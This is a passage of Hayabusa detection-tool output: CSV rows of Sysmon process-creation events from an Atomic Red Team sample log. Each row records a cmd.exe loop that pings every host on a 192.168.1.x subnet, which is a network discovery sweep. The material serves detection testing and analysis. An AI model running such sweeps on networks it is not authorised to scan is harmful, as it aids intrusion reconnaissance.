747F3D96-D925-5D31-0000-0010563F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:22.030 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:22.542 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:23.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:23.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:24.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:24.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:25.035 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:25.529 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:26.007 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:26.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:27.040 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:27.493 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:28.017 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:28.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:29.110 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:29.561 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:30.054 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:30.526 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:31.015 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:31.476 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:32.005 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:32.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:33.004 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:33.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:33.900 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:34.490 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:35.031 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:35.411 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:35.999 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:36.510 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:36.905 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:37.449 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:37.947 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:38.514 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:38.992 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:39.508 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:40.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:40.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:40.960 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:41.512 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:41.967 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:42.436 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:42.881 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:43.478 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:43.951 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:44.408 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:44.926 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser 